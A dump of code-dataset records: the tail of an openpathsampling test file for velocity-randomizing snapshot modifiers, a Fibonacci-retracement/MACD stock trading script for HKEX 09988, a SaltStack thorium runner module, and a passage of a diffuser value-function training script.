new_2x3D.velocities.flatten():\n assert val != 0.0\n\n new_3x1D = randomizer(self.snap_3x1D)\n assert new_3x1D.coordinates.shape == new_3x1D.velocities.shape\n assert_array_almost_equal(new_3x1D.coordinates,\n self.snap_3x1D.coordinates)\n assert new_3x1D is not self.snap_3x1D\n assert new_3x1D.coordinates is not self.snap_3x1D.coordinates\n assert new_3x1D.velocities is not self.snap_3x1D.velocities\n for val in new_3x1D.velocities.flatten():\n assert val != 0.0\n\n def test_subset_call(self):\n randomizer = RandomVelocities(beta=old_div(1.0, 5.0), subset_mask=[0])\n new_2x3D = randomizer(self.snap_2x3D)\n assert new_2x3D.coordinates.shape == new_2x3D.velocities.shape\n assert_array_almost_equal(new_2x3D.coordinates,\n self.snap_2x3D.coordinates)\n assert new_2x3D is not self.snap_2x3D\n assert new_2x3D.coordinates is not self.snap_2x3D.coordinates\n assert new_2x3D.velocities is not self.snap_2x3D.velocities\n # show that the unchanged atom is, in fact, unchanged\n assert_array_almost_equal(new_2x3D.velocities[1],\n self.snap_2x3D.velocities[1])\n for val in new_2x3D.velocities[0]:\n assert val != 0.0\n\n def test_no_beta_bad_engine(self):\n engine = self.snap_2x3D.engine\n randomizer = RandomVelocities(engine=engine)\n with pytest.raises(RuntimeError):\n randomizer(self.snap_2x3D)\n\n def test_with_openmm_snapshot(self):\n # note: this is only a smoke test; correctness depends on OpenMM's\n # tests of its constraint approaches.\n if not omt:\n pytest.skip(\"Requires OpenMMTools (not installed)\")\n test_system = omt.testsystems.AlanineDipeptideVacuum()\n template = omm_engine.snapshot_from_testsystem(test_system)\n engine = omm_engine.Engine(\n topology=template.topology,\n system=test_system.system,\n integrator=omt.integrators.VVVRIntegrator()\n )\n beta = old_div(1.0, (300.0 * u.kelvin * u.BOLTZMANN_CONSTANT_kB))\n\n # when the engine doesn't have an existing snapshot\n randomizer = RandomVelocities(beta=beta, engine=engine)\n new_snap = randomizer(template)\n # coordinates stayed the same\n assert_array_almost_equal(template.coordinates,\n new_snap.coordinates)\n # velocities changed\n assert not np.isclose(template.velocities, new_snap.velocities).all()\n engine.generate(new_snap, [lambda x, foo: len(x) <= 4])\n\n # when the engine does have an existing snapshot\n zeros = np.zeros((engine.n_atoms, engine.n_spatial))\n zero_snap = paths.engines.openmm.Snapshot.construct(\n coordinates=zeros * u.nanometer,\n velocities=zeros * u.nanometer / u.picosecond,\n box_vectors=template.box_vectors,\n engine=engine\n )\n engine.current_snapshot = zero_snap\n randomizer = RandomVelocities(beta=beta, engine=engine)\n new_snap = randomizer(template)\n # coordinates stayed the same\n assert_array_almost_equal(template.coordinates,\n new_snap.coordinates)\n # velocities changed\n assert not np.isclose(template.velocities, new_snap.velocities).all()\n\n # internal snapshot unchanged\n assert engine.current_snapshot == zero_snap\n engine.generate(new_snap, [lambda x, foo: len(x) <= 4])\n\n def test_probability_ratio(self):\n # Should be sampled correctio, so this has to be 1.0\n randomizer = RandomVelocities(beta=20)\n assert randomizer.probability_ratio(None, None) == 1.0\n\n\nclass TestGeneralizedDirectionModifier(object):\n def setup_method(self):\n import openpathsampling.engines.toy as toys\n # applies one delta_v to all atoms\n self.toy_modifier_all = GeneralizedDirectionModifier(1.5)\n # defines delta_v per atom, including those not in the mask\n self.toy_modifier_long_dv = GeneralizedDirectionModifier(\n delta_v=[0.5, 1.0, 2.0],\n subset_mask=[1, 2]\n )\n # defines delta_v per atom in the subset mask\n self.toy_modifier = GeneralizedDirectionModifier(\n delta_v=[1.0, 2.0],\n subset_mask=[1, 2]\n )\n self.toy_engine = toys.Engine(\n topology=toys.Topology(n_spatial=2, n_atoms=3, pes=None,\n masses=[1.0, 1.5, 4.0]),\n options={}\n )\n self.toy_snapshot = toys.Snapshot(\n coordinates=np.array([[0.0, 0.0], [0.0, 0.0], [0.0, 0.0]]),\n velocities=np.array([[1.0, 1.0], [2.0, 2.0], [3.0, 3.0]]),\n engine=self.toy_engine\n )\n\n # create the OpenMM versions\n if not omt:\n pytest.skip(\"Requires OpenMMTools (not installed)\")\n if not u:\n pytest.skip(\"Requires openmm.unit (not installed)\")\n u_vel = old_div(u.nanometer, u.picosecond)\n self.openmm_modifier = GeneralizedDirectionModifier(1.2 * u_vel)\n ad_vacuum = omt.testsystems.AlanineDipeptideVacuum(constraints=None)\n self.test_snap = omm_engine.snapshot_from_testsystem(ad_vacuum)\n self.openmm_engine = omm_engine.Engine(\n topology=self.test_snap.topology,\n system=ad_vacuum.system,\n integrator=omt.integrators.VVVRIntegrator()\n )\n self.openmm_snap = self.test_snap.copy_with_replacement(\n engine=self.openmm_engine\n )\n\n def test_verify_snapshot_toy(self):\n self.toy_modifier._verify_snapshot(self.toy_snapshot)\n self.toy_modifier_all._verify_snapshot(self.toy_snapshot)\n self.toy_modifier_long_dv._verify_snapshot(self.toy_snapshot)\n\n def test_verify_snapshot_openmm(self):\n self.openmm_modifier._verify_snapshot(self.openmm_snap)\n\n def test_verify_snapshot_no_dofs(self):\n assert isinstance(self.test_snap.engine,\n omm_engine.tools.OpenMMToolsTestsystemEngine)\n with pytest.raises(RuntimeError, match=\"missing n_degrees_of_freedom\"):\n self.openmm_modifier._verify_snapshot(self.test_snap)\n\n def test_verify_snapshot_constraints(self):\n ad_vacuum_constr = omt.testsystems.AlanineDipeptideVacuum()\n constrained_engine = omm_engine.Engine(\n topology=self.test_snap.topology,\n system=ad_vacuum_constr.system,\n integrator=omt.integrators.VVVRIntegrator()\n )\n constr_snap = self.test_snap.copy_with_replacement(\n engine=constrained_engine\n )\n with pytest.raises(RuntimeError, match=\"constraints\"):\n self.openmm_modifier._verify_snapshot(constr_snap)\n\n def test_verify_engine_constraints(self):\n ad_vacuum_constr = omt.testsystems.AlanineDipeptideVacuum()\n constrained_engine = omm_engine.Engine(\n topology=self.test_snap.topology,\n system=ad_vacuum_constr.system,\n integrator=omt.integrators.VVVRIntegrator()\n )\n modifier = GeneralizedDirectionModifier(\n 1.2 * u.nanometer / u.picosecond,\n engine=constrained_engine\n )\n # this is a hack because ndofs not defined in TestsystemEngine\n self.openmm_engine.current_snapshot = self.test_snap\n snap = self.openmm_engine.current_snapshot\n # when it checks based on the engine, it should be fine\n self.openmm_modifier._verify_snapshot(snap)\n # when modifier overrides snap.engine, it errors\n with pytest.raises(RuntimeError, match=\"constraints\"):\n modifier._verify_snapshot(snap)\n\n def test_verify_snapshot_box_vectors(self):\n ad_explicit = omt.testsystems.AlanineDipeptideExplicit(\n constraints=None,\n rigid_water=False\n )\n ad_explicit_tmpl = omm_engine.snapshot_from_testsystem(ad_explicit)\n explicit_engine = omm_engine.Engine(\n topology=ad_explicit_tmpl.topology,\n system=ad_explicit.system,\n integrator=omt.integrators.VVVRIntegrator()\n )\n ad_explicit_snap = ad_explicit_tmpl.copy_with_replacement(\n engine=explicit_engine\n )\n self.openmm_modifier._verify_snapshot(ad_explicit_snap)\n\n def test_dv_widths_toy(self):\n selected = np.array([1.0, 2.0])\n n_atoms = len(self.toy_snapshot.coordinates)\n assert_array_almost_equal(self.toy_modifier._dv_widths(n_atoms, 2),\n selected)\n assert_array_almost_equal(\n self.toy_modifier_long_dv._dv_widths(n_atoms, 2),\n selected\n )\n assert_array_almost_equal(\n self.toy_modifier_all._dv_widths(n_atoms, n_atoms),\n np.array([1.5]*3)\n )\n\n def test_dv_widths_openmm(self):\n n_atoms = len(self.openmm_snap.coordinates)\n results = self.openmm_modifier._dv_widths(n_atoms, n_atoms)\n expected = np.array([1.2] * n_atoms) * u.nanometer / u.picosecond\n for truth, beauty in zip(expected, results):\n assert pytest.approx(truth._value) == beauty._value\n\n def test_rescale_linear_momenta_constant_energy_toy(self):\n velocities = np.array([[1.5, -1.0], [-1.0, 2.0], [0.25, -1.0]])\n masses = np.array([1.0, 1.5, 4.0])\n new_vel = self.toy_modifier._remove_linear_momentum(\n velocities=velocities,\n masses=masses\n )\n new_momenta = new_vel * masses[:, np.newaxis]\n total_momenta = sum(new_momenta)\n assert_array_almost_equal(total_momenta, np.array([0.0]*2))\n new_vel = self.toy_modifier._rescale_kinetic_energy(\n velocities=velocities,\n masses=masses,\n double_KE=20.0\n )\n new_momenta = new_vel * masses[:, np.newaxis]\n total_momenta = sum(new_momenta)\n new_ke = sum(sum(new_momenta * new_vel))\n # tests require that the linear momentum be 0, and KE be correct\n assert_array_almost_equal(total_momenta, np.array([0.0]*2))\n assert pytest.approx(new_ke) == 20.0\n\n def test_remove_momentum_rescale_energy_openmm(self):\n # don't actually need to do everything with OpenMM, but do need to\n # add units\n u_vel = old_div(u.nanometer, u.picosecond)\n u_mass = old_div(u.dalton, u.AVOGADRO_CONSTANT_NA)\n u_energy = old_div(u.kilojoule_per_mole, u.AVOGADRO_CONSTANT_NA)\n\n velocities = np.array([[1.5, -1.0],\n [-1.0, 2.0],\n [0.25, -1.0]]\n ) * u_vel\n masses = np.array([1.0, 1.5, 4.0]) * u_mass\n new_vel = self.openmm_modifier._remove_linear_momentum(\n velocities=velocities,\n masses=masses\n )\n new_momenta = new_vel * masses[:, np.newaxis]\n total_momenta = sum(new_momenta, new_momenta[0])\n assert_array_almost_equal(total_momenta,\n np.array([0.0]*2) * u_vel * u_mass)\n\n new_vel = self.openmm_modifier._rescale_kinetic_energy(\n velocities=velocities,\n masses=masses,\n double_KE=20.0 * u_energy\n )\n new_momenta = new_vel * masses[:, np.newaxis]\n total_momenta = sum(new_momenta, new_momenta[0])\n zero_energy = 0.0 * u_energy\n new_ke = sum(sum(new_momenta * new_vel, zero_energy), zero_energy)\n # tests require that the linear momentum be 0, and KE be correct\n assert_array_almost_equal(total_momenta,\n np.array([0.0]*2) * u_vel * u_mass)\n assert new_ke.unit == (20.0 * u_energy).unit\n assert pytest.approx(new_ke._value) == (20.0 * u_energy)._value\n\n def test_probability_ratio(self):\n # Should always be 1 as KE is conserved\n assert self.toy_modifier_all.probability_ratio(None, None) == 1.0\n\n\nclass TestVelocityDirectionModifier(object):\n def setup_method(self):\n import openpathsampling.engines.toy as toys\n self.toy_modifier = VelocityDirectionModifier(\n delta_v=[1.0, 2.0],\n subset_mask=[1, 2],\n remove_linear_momentum=False\n )\n self.toy_engine = toys.Engine(\n topology=toys.Topology(n_spatial=2, n_atoms=3, pes=None,\n masses=np.array([1.0, 1.5, 4.0])),\n options={}\n )\n self.toy_snapshot = toys.Snapshot(\n coordinates=np.array([[0.0, 0.0], [0.0, 0.0], [0.0, 0.0]]),\n velocities=np.array([[1.0, 1.0], [2.0, 2.0], [3.0, 3.0]]),\n engine=self.toy_engine\n )\n\n if paths.integration_tools.HAS_SIMTK_UNIT:\n u_vel = old_div(u.nanometer, u.picosecond)\n self.openmm_modifier = VelocityDirectionModifier(\n delta_v=1.2*u_vel,\n remove_linear_momentum=False\n )\n if omt: # TODO: separate out tests\n ad_vacuum = omt.testsystems.AlanineDipeptideVacuum(\n constraints=None)\n self.test_snap = omm_engine.snapshot_from_testsystem(ad_vacuum)\n self.openmm_engine = omm_engine.Engine(\n topology=self.test_snap.topology,\n system=ad_vacuum.system,\n integrator=omt.integrators.VVVRIntegrator()\n )\n\n self.openmm_snap = self.test_snap.copy_with_replacement(\n engine=self.openmm_engine,\n velocities=np.ones(\n shape=self.test_snap.velocities.shape) * u_vel\n )\n\n def test_select_atoms_to_modify(self):\n assert self.toy_modifier._select_atoms_to_modify(2) == [0, 1]\n if omt: # TODO: separate out tests\n n_atoms = len(self.openmm_snap.coordinates)\n assert (self.openmm_modifier._select_atoms_to_modify(n_atoms) ==\n list(range(n_atoms)))\n\n def test_call(self):\n new_toy_snap = self.toy_modifier(self.toy_snapshot)\n assert_array_almost_equal(new_toy_snap.coordinates,\n self.toy_snapshot.coordinates)\n new_vel = new_toy_snap.velocities\n old_vel = self.toy_snapshot.velocities\n same_vel = [np.allclose(new_vel[i], old_vel[i])\n for i in range(len(new_vel))]\n assert Counter(same_vel) == Counter({True: 1, False: 2})\n for new_v, old_v in zip(new_vel, old_vel):\n assert (pytest.approx(sum([v**2 for v in new_v])) ==\n sum([v**2 for v in old_v]))\n\n if omt: # TODO: separate out tests\n new_omm_snap = self.openmm_modifier(self.openmm_snap)\n n_atoms = len(self.openmm_snap.coordinates)\n assert_array_almost_equal(new_omm_snap.coordinates,\n self.openmm_snap.coordinates)\n new_vel = new_omm_snap.velocities\n old_vel = self.openmm_snap.velocities\n same_vel = [np.allclose(new_vel[i], old_vel[i])\n for i in range(len(new_vel))]\n same_vel = [np.allclose(new_vel[i], old_vel[i])\n for i in range(len(new_vel))]\n assert Counter(same_vel) == Counter({False: n_atoms})\n u_vel_sq = (old_div(u.nanometers, u.picoseconds))**2\n for new_v, old_v in zip(new_vel, old_vel):\n assert (pytest.approx(sum([(v**2).value_in_unit(u_vel_sq)\n for v in new_v])\n ) ==\n sum([(v**2).value_in_unit(u_vel_sq) for v in old_v])\n )\n\n def test_call_with_linear_momentum_fix(self):\n toy_modifier = VelocityDirectionModifier(\n delta_v=[1.0, 2.0],\n subset_mask=[1, 2],\n remove_linear_momentum=True\n )\n new_toy_snap = toy_modifier(self.toy_snapshot)\n velocities = new_toy_snap.velocities\n momenta = velocities * new_toy_snap.masses[:, np.newaxis]\n assert_array_almost_equal(sum(momenta), np.array([0.0]*2))\n double_ke = sum(sum(momenta * velocities))\n assert pytest.approx(double_ke) == 86.0\n\n if omt: # TODO: separate out tests\n u_vel = old_div(u.nanometer, u.picosecond)\n u_mass = old_div(u.dalton, u.AVOGADRO_CONSTANT_NA)\n\n openmm_modifier = VelocityDirectionModifier(\n delta_v=1.2*u_vel,\n remove_linear_momentum=False\n )\n new_openmm_snap = openmm_modifier(self.openmm_snap)\n velocities = new_openmm_snap.velocities\n momenta = velocities * new_openmm_snap.masses[:, np.newaxis]\n zero_momentum = 0 * u_vel * u_mass\n total_momenta = sum(momenta, zero_momentum)\n assert_array_almost_equal(total_momenta,\n np.array([0.0]*3) * u_vel * u_mass)\n\n\nclass TestSingleAtomVelocityDirectionModifier(object):\n def setup_method(self):\n import openpathsampling.engines.toy as toys\n self.toy_modifier = SingleAtomVelocityDirectionModifier(\n delta_v=[1.0, 2.0],\n subset_mask=[1, 2],\n remove_linear_momentum=False\n )\n self.toy_engine = toys.Engine(\n topology=toys.Topology(n_spatial=2, n_atoms=3, pes=None,\n masses=np.array([1.0, 1.5, 4.0])),\n options={}\n )\n self.toy_snapshot = toys.Snapshot(\n coordinates=np.array([[0.0, 0.0], [0.0, 0.0], [0.0, 0.0]]),\n velocities=np.array([[1.0, 1.0], [2.0, 2.0], [3.0, 3.0]]),\n engine=self.toy_engine\n )\n\n if omt: # TODO: separate out tests/\n u_vel = old_div(u.nanometer, u.picosecond)\n self.openmm_modifier = SingleAtomVelocityDirectionModifier(\n delta_v=1.2*u_vel,\n remove_linear_momentum=False\n )\n ad_vacuum = omt.testsystems.AlanineDipeptideVacuum(\n constraints=None)\n self.test_snap = omm_engine.snapshot_from_testsystem(ad_vacuum)\n self.openmm_engine = omm_engine.Engine(\n topology=self.test_snap.topology,\n system=ad_vacuum.system,\n integrator=omt.integrators.VVVRIntegrator()\n )\n\n self.openmm_snap = self.test_snap.copy_with_replacement(\n engine=self.openmm_engine,\n velocities=np.ones(\n shape=self.test_snap.velocities.shape) * u_vel\n )\n\n def test_select_atoms_to_modify(self):\n selected = self.toy_modifier._select_atoms_to_modify(2)\n assert len(selected) == 1\n selected = [self.toy_modifier._select_atoms_to_modify(2)[0]\n for i in range(20)]\n count = Counter(selected)\n assert set([0, 1]) == set(count.keys())\n assert count[0] > 0\n assert count[1] > 0\n\n def test_call(self):\n new_toy_snap = self.toy_modifier(self.toy_snapshot)\n assert_array_almost_equal(new_toy_snap.coordinates,\n self.toy_snapshot.coordinates)\n new_vel = new_toy_snap.velocities\n old_vel = self.toy_snapshot.velocities\n same_vel = [np.allclose(new_vel[i], old_vel[i])\n for i in range(len(new_vel))]\n assert Counter(same_vel) == Counter({True: 2, False: 1})\n for new_v, old_v in zip(new_vel, old_vel):\n assert (pytest.approx(sum([v**2 for v in new_v])) ==\n sum([v**2 for v in old_v]))\n\n if omt: # TODO: separate out tests\n new_omm_snap = self.openmm_modifier(self.openmm_snap)\n n_atoms = len(self.openmm_snap.coordinates)\n assert_array_almost_equal(new_omm_snap.coordinates,\n self.openmm_snap.coordinates)\n new_vel = new_omm_snap.velocities\n old_vel = self.openmm_snap.velocities\n same_vel = [np.allclose(new_vel[i], old_vel[i])\n for i in range(len(new_vel))]\n same_vel = [np.allclose(new_vel[i], old_vel[i])\n for i in range(len(new_vel))]\n assert Counter(same_vel) == Counter({True: n_atoms-1, False: 1})\n u_vel_sq = (old_div(u.nanometers, u.picoseconds))**2\n for new_v, old_v in zip(new_vel, old_vel):\n assert (pytest.approx(\n sum([(v**2).value_in_unit(u_vel_sq) for v in new_v])) ==\n sum([(v**2).value_in_unit(u_vel_sq) for v in old_v]))\n\n def test_call_with_linear_momentum_fix(self):\n toy_modifier = SingleAtomVelocityDirectionModifier(\n delta_v=[1.0, 2.0],\n subset_mask=[1, 2],\n remove_linear_momentum=True\n )\n new_toy_snap = toy_modifier(self.toy_snapshot)\n velocities = new_toy_snap.velocities\n momenta = velocities * new_toy_snap.masses[:, np.newaxis]\n assert_array_almost_equal(sum(momenta), np.array([0.0]*2))\n double_ke = sum(sum(momenta * velocities))\n assert pytest.approx(double_ke) == 86.0\n\n if omt: # TODO: separate out tests\n u_vel = old_div(u.nanometer, u.picosecond)\n u_mass = old_div(u.dalton, u.AVOGADRO_CONSTANT_NA)\n\n openmm_modifier = SingleAtomVelocityDirectionModifier(\n delta_v=1.2*u_vel,\n remove_linear_momentum=False\n )\n new_openmm_snap = openmm_modifier(self.openmm_snap)\n velocities = new_openmm_snap.velocities\n momenta = velocities * new_openmm_snap.masses[:, np.newaxis]\n zero_momentum = 0 * u_vel * u_mass\n total_momenta = sum(momenta, zero_momentum)\n assert_array_almost_equal(total_momenta,\n np.array([0.0]*3) * u_vel * u_mass)\n\n\nclass TestSnapshotModifierDeprecations(object):\n # TODO OPS 2.0: Depr should be completed and this test altered to check for\n # the error\n def test_raise_deprecation_prob_ratio(self):\n class DummyMod(SnapshotModifier):\n # TODO PY 2.7, don't override __call__ for PY 3.x\n def __call__(self, a):\n pass\n dummy_mod = DummyMod()\n with pytest.warns(DeprecationWarning) as warn:\n a = dummy_mod.probability_ratio(None, None)\n assert len(warn) == 1\n assert \"NotImplementedError\" in str(warn[0])\n assert a == 1.0\n\n def test_raise_depr_nomodifier_subset(self):\n # The warning might be emited before on line 75\n # (NoModification(subset_mask))\n # Therefor this will not always trigger\n pass\n # with pytest.warns(DeprecationWarning) as warn:\n # _ = NoModification(subset_mask=\"foo\")\n # assert len(warn) == 1\n # assert \"subset_mask\" in str(warn[0])\n","repo_name":"openpathsampling/openpathsampling","sub_path":"openpathsampling/tests/test_snapshot_modifier.py","file_name":"test_snapshot_modifier.py","file_ext":"py","file_size_in_byte":31385,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"78"} +{"seq_id":"22586342191","text":"# import libraries\n# from polygon_config import POLYGON_API_TOKEN\nimport json\nfrom pandas.core.indexes.base import Index\nimport quandl\nimport pandas as pd\nimport datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom quandl_config import API_KEY\nplt.style.use('fivethirtyeight')\n\n# from polygon_config import POLYGON_API_TOKEN\n\n# The following code uses polygon.io as data source\n# Data = f\"https://api.polygon.io/v1/open-close/AAPL/2020-10-14?adjusted=true&apiKey={POLYGON_API_TOKEN}\"\n\n# data = requests.get(Data)\n\n# print(data.json())\n# , start_date=\"2020-1-1\", end_date=\"2021-1-31\"\n\n\n# The follwing code uses quandl as data source\ndata = quandl.get(\n \"HKEX/09988\", authtoken=API_KEY, start_date=\"2019-1-1\", end_date=\"2021-3-31\")\n\n\n# set datetime as index\ndf = pd.DataFrame(data)\n\n\ncore_five = df[[\"High\", \"Low\", \"Nominal Price\",\n \"Previous Close\", \"Share Volume (000)\"]]\n\nncf = core_five.rename(columns={\"Nominal Price\": \"Close\",\n \"Share Volume (000)\": \"Volume (000)\"})\n\n\n# Calcualte the Fibonacci Retractment levels\n\nmax_price = ncf['Close'].max()\nmin_price = ncf['Close'].min()\n\ndifference = max_price - min_price\nfirst_level = max_price - difference * 0.236\nsecond_level = max_price - difference * 0.382\nthird_level = max_price - difference * 0.5\nfourth_level = max_price - difference * 0.618\n\n# Calculate the MACD line and the Signal Line indicator\n# Calculate the Short Term exponention Moving Average\n\nShortEMA = ncf.Close.ewm(span=12, adjust=False).mean()\n# Calcualte the Long term Exponentila Moving Average\n\nLongEMA = ncf.Close.ewm(span=26, adjust=False).mean()\n\n# Cacualte the Moving Average Convergence/Divergence (MACD)\nMACD = ShortEMA - LongEMA\n\n# Calcualte the Signal Line\nsignal = MACD.ewm(span=9, adjust=False).mean()\n\n# Plot the fibonacci Levels along with the close price and the MACD and signal line\nnew_df = ncf\n\n\n# plot the Fibonacci Levels\n# plt.figure(figsize=(12.33, 9.5))\n# plt.subplot(2, 1, 1)\n# plt.plot(new_df.index, new_df['Close'])\n# plt.axhline(max_price, linestyle='--', alpha=0.5, color='red')\n# plt.axhline(first_level, linestyle='--', alpha=0.5, color='orange')\n# plt.axhline(second_level, linestyle='--', alpha=0.5, color='yellow')\n# plt.axhline(third_level, linestyle='--', alpha=0.5, color='green')\n# plt.axhline(fourth_level, linestyle='--', alpha=0.5, color='blue')\n# plt.axhline(min_price, linestyle='--', alpha=0.5, color='purple')\n# plt.ylabel('Fibonacci')\n\n# Plot the MACD Line and the Signal Line\n\n# plt.subplot(2, 1, 2)\n# plt.plot(new_df.index, MACD)\n# plt.plot(new_df.index, signal)\n# plt.ylabel('MACD')\n# plt.xticks(rotation=45)\n# plt.show()\n\n# Create new columns for the data frame\nncf['MACD'] = MACD\nncf['Signal Line'] = signal\n\n\n# Create a function to be used in our strategy to get the upeer fibonacci level and the lower fibonacci level of the current price\n\ndef getlevels(price):\n if price >= first_level:\n return (max_price, first_level)\n elif price >= second_level:\n return(first_level, second_level)\n elif price >= third_level:\n return(second_level, third_level)\n elif price >= fourth_level:\n return(third_level, fourth_level)\n else:\n return(fourth_level, min_price)\n\n# Create a function for the trading strategy\n\n# The strategy\n\n# If the signal leine crosses above the MACD line and the current price crossed above ot below the last Fibonacci level, then buy\n\n# If the signal line crosses below the MACD Line and the current price corssed above or below the last Fibonacci level , then sell\n\n# Never sell at a price that is lower than I bought\n\n\ndef strategy(df):\n buy_list = []\n sell_list = []\n flag = 0\n last_buy_price = 0\n\n # Loop through the data set\n for i in range(0, df.shape[0]):\n price = ncf['Close'][i]\n # If this is the first data point within the data set, then get the elvel above and below it\n if i == 0:\n upper_lvl, lower_lvl = getlevels(price)\n buy_list.append(np.nan)\n sell_list.append(np.nan)\n # Else if the current price is gretaer than or equal to the upper level ot less than ot equal to the lower level, then we knoe the price has 'hit' or crossed a fibonacci level\n elif price >= upper_lvl or price <= lower_lvl:\n\n # Check to see if the MACD line crossed above or below the signal line\n if ncf['Signal Line'][i] > ncf['MACD'][i] and flag == 0:\n last_buy_price = price\n buy_list.append(price)\n sell_list.append(np.nan)\n # set the flag to 1 to singal that the share was bought\n flag = 1\n\n elif ncf['Signal Line'][i] < ncf['MACD'][i] and flag == 1 and price > last_buy_price:\n buy_list.append(np.nan)\n sell_list.append(price)\n # Set the Flag to 0 to signal that the share was sold\n flag = 0\n else:\n buy_list.append(np.nan)\n sell_list.append(np.nan)\n else:\n buy_list.append(np.nan)\n sell_list.append(np.nan)\n\n # Update the new levels\n upper_lvl, lower_lvl = getlevels(price)\n\n return buy_list, sell_list\n\n\n# Create buy and sell columns\nbuy, sell = strategy(df)\nncf['Buy_Signal_Price'] = buy\nncf['Sell_Signal_Price'] = sell\n# Show data\n# print(ncf)\n\n# Plot the fibonacci levels along with the\n\nnew_df = ncf\n\nplt.figure(figsize=(12.33, 4.5))\nplt.plot(new_df.index, new_df['Close'], alpha=0.5)\nplt.scatter(new_df.index, new_df['Buy_Signal_Price'],\n color='green', marker='^', alpha=1)\nplt.scatter(new_df.index, new_df['Sell_Signal_Price'],\n color='red', marker='v', alpha=1)\nplt.axhline(max_price, linestyle='--', alpha=0.5, color='red')\nplt.axhline(first_level, linestyle='--', alpha=0.5, color='orange')\nplt.axhline(second_level, linestyle='--', alpha=0.5, color='yellow')\nplt.axhline(third_level, linestyle='--', alpha=0.5, color='green')\nplt.axhline(fourth_level, linestyle='--', alpha=0.5, color='blue')\nplt.axhline(min_price, linestyle='--', alpha=0.5, color='purple')\nplt.ylabel('Clsoe Price in HKD')\nplt.xlabel('Date')\nplt.xticks(rotation=45)\nplt.show()\n#ncf.to_csv('09988.csv', index=False)\n# print(new_core_five)\n","repo_name":"ProjectVH/fibonnacci_strat","sub_path":"fibonnacci.py","file_name":"fibonnacci.py","file_ext":"py","file_size_in_byte":6272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12849698954","text":"\"\"\"\nReact by calling asynchronous runners\n\"\"\"\n\nimport salt.runner\n\n\ndef cmd(name, func=None, arg=(), **kwargs):\n \"\"\"\n Execute a runner asynchronous:\n\n USAGE:\n\n .. code-block:: yaml\n\n run_cloud:\n runner.cmd:\n - func: cloud.create\n - arg:\n - my-ec2-config\n - myinstance\n\n run_cloud:\n runner.cmd:\n - func: cloud.create\n - kwargs:\n provider: my-ec2-config\n instances: myinstance\n \"\"\"\n ret = {\"name\": name, \"changes\": {}, \"comment\": \"\", \"result\": True}\n if func is None:\n func = name\n local_opts = {}\n local_opts.update(__opts__)\n local_opts[\"async\"] = True # ensure this will be run asynchronous\n local_opts.update({\"fun\": func, \"arg\": arg, \"kwarg\": kwargs})\n runner = salt.runner.Runner(local_opts)\n runner.run()\n return ret\n","repo_name":"saltstack/salt","sub_path":"salt/thorium/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"20013792970","text":"import diffuser.utils as utils\nimport pdb\nfrom cost import action_cost, qvel_cost, vel_cost, healthy_cost\n\n#-----------------------------------------------------------------------------#\n#----------------------------------- setup -----------------------------------#\n#-----------------------------------------------------------------------------#\n\nclass Parser(utils.Parser):\n dataset: str = 'walker2d-medium-replay-v2'\n config: str = 'config.locomotion'\n\nargs = Parser().parse_args('cost_values')\n\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '3'\n\n#binarization_threshold\n# action = 1.5, vel = 2.5\n\ndef cost_func(*a, **kwargs):\n #kwargs['is_single_step'] = True\n #kwargs['binarization_threshold'] = 2.5\n kwargs['env_name'] = args.dataset.split(\"-\")[0]\n return vel_cost(*a, **kwargs)\n\n#-----------------------------------------------------------------------------#\n#---------------------------------- dataset ----------------------------------#\n#-----------------------------------------------------------------------------#\n\ndataset_config = utils.Config(\n args.loader,\n savepath=(args.savepath, 'dataset_config.pkl'),\n env=args.dataset,\n horizon=args.horizon,\n normalizer=args.normalizer,\n preprocess_fns=args.preprocess_fns,\n use_padding=args.use_padding,\n max_path_length=args.max_path_length,\n ## value-specific kwargs\n discount=args.discount,\n termination_penalty=args.termination_penalty,\n normed=args.normed,\n cost_func=cost_func\n)\n\nrender_config = utils.Config(\n args.renderer,\n savepath=(args.savepath, 'render_config.pkl'),\n env=args.dataset,\n)\n\ndataset = dataset_config()\nrenderer = render_config()\n\nobservation_dim = dataset.observation_dim\naction_dim = dataset.action_dim\n\n#-----------------------------------------------------------------------------#\n#------------------------------ model & trainer ------------------------------#\n#-----------------------------------------------------------------------------#\n\nif \"decouple\" in args.config:\n dynamic_model_config = utils.Config(\n args.model,\n savepath=(args.savepath, 'dynamic_model_config.pkl'),\n horizon=args.horizon,\n transition_dim=observation_dim+action_dim,\n output_dim=observation_dim,\n cond_dim=observation_dim,\n dim_mults=args.dim_mults,\n attention=args.attention,\n device=args.device,\n )\n\n policy_model_config = utils.Config(\n args.model,\n savepath=(args.savepath, 'policy_model_config.pkl'),\n horizon=args.horizon,\n transition_dim=observation_dim+action_dim,\n output_dim=action_dim,\n cond_dim=observation_dim,\n dim_mults=args.dim_mults,\n attention=args.attention,\n device=args.device,\n )\nelse:\n model_config = utils.Config(\n args.model,\n savepath=(args.savepath, 'model_config.pkl'),\n horizon=args.horizon,\n transition_dim=observation_dim + action_dim,\n cond_dim=observation_dim,\n dim_mults=args.dim_mults,\n device=args.device,\n )\n\ndiffusion_config = utils.Config(\n args.diffusion,\n savepath=(args.savepath, 'diffusion_config.pkl'),\n horizon=args.horizon,\n observation_dim=observation_dim,\n action_dim=action_dim,\n n_timesteps=args.n_diffusion_steps,\n loss_type=args.loss_type,\n device=args.device,\n)\n\ntrainer_config = utils.Config(\n utils.Trainer,\n savepath=(args.savepath, 'trainer_config.pkl'),\n train_batch_size=args.batch_size,\n train_lr=args.learning_rate,\n gradient_accumulate_every=args.gradient_accumulate_every,\n ema_decay=args.ema_decay,\n sample_freq=args.sample_freq,\n save_freq=args.save_freq,\n label_freq=int(args.n_train_steps // args.n_saves),\n save_parallel=args.save_parallel,\n results_folder=args.savepath,\n bucket=args.bucket,\n n_reference=args.n_reference,\n)\n\n#-----------------------------------------------------------------------------#\n#-------------------------------- instantiate --------------------------------#\n#-----------------------------------------------------------------------------#\n\nif \"decouple\" in args.config:\n dynamic_model = dynamic_model_config()\n policy_model = policy_model_config()\n diffusion = diffusion_config(policy_model, dynamic_model)\nelse:\n model = model_config()\n diffusion = diffusion_config(model)\n\ntrainer = trainer_config(diffusion, dataset, renderer)\n\n#-----------------------------------------------------------------------------#\n#------------------------ test forward & backward pass 